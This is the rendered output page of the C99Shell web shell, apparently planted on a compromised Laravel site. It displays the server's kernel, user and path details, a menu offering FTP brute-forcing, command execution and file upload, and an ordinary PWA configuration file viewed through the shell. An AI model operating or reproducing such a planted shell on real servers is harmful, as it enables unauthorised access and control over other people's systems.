!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/silviolleite/laravelpwa/Config/   drwxr-xr-x
Free 28.41 GB of 117.98 GB (24.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     config.php (2.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

return [
    
'name' => 'LaravelPWA',
    
'manifest' => [
        
'name' => env('APP_NAME''My PWA App'),
        
'short_name' => 'PWA',
        
'start_url' => '/',
        
'background_color' => '#ffffff',
        
'theme_color' => '#000000',
        
'display' => 'standalone',
        
'orientation'=> 'any',
        
'status_bar'=> 'black',
        
'icons' => [
            
'72x72' => [
                
'path' => '/images/icons/icon-72x72.png',
                
'purpose' => 'any'
            
],
            
'96x96' => [
                
'path' => '/images/icons/icon-96x96.png',
                
'purpose' => 'any'
            
],
            
'128x128' => [
                
'path' => '/images/icons/icon-128x128.png',
                
'purpose' => 'any'
            
],
            
'144x144' => [
                
'path' => '/images/icons/icon-144x144.png',
                
'purpose' => 'any'
            
],
            
'152x152' => [
                
'path' => '/images/icons/icon-152x152.png',
                
'purpose' => 'any'
            
],
            
'192x192' => [
                
'path' => '/images/icons/icon-192x192.png',
                
'purpose' => 'any'
            
],
            
'384x384' => [
                
'path' => '/images/icons/icon-384x384.png',
                
'purpose' => 'any'
            
],
            
'512x512' => [
                
'path' => '/images/icons/icon-512x512.png',
                
'purpose' => 'any'
            
],
        ],
        
'splash' => [
            
'640x1136' => '/images/icons/splash-640x1136.png',
            
'750x1334' => '/images/icons/splash-750x1334.png',
            
'828x1792' => '/images/icons/splash-828x1792.png',
            
'1125x2436' => '/images/icons/splash-1125x2436.png',
            
'1242x2208' => '/images/icons/splash-1242x2208.png',
            
'1242x2688' => '/images/icons/splash-1242x2688.png',
            
'1536x2048' => '/images/icons/splash-1536x2048.png',
            
'1668x2224' => '/images/icons/splash-1668x2224.png',
            
'1668x2388' => '/images/icons/splash-1668x2388.png',
            
'2048x2732' => '/images/icons/splash-2048x2732.png',
        ],
        
'shortcuts' => [
            [
                
'name' => 'Shortcut Link 1',
                
'description' => 'Shortcut Link 1 Description',
                
'url' => '/shortcutlink1',
                
'icons' => [
                    
"src" => "/images/icons/icon-72x72.png",
                    
"purpose" => "any"
                
]
            ],
            [
                
'name' => 'Shortcut Link 2',
                
'description' => 'Shortcut Link 2 Description',
                
'url' => '/shortcutlink2'
            
]
        ],
        
'custom' => []
    ]
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--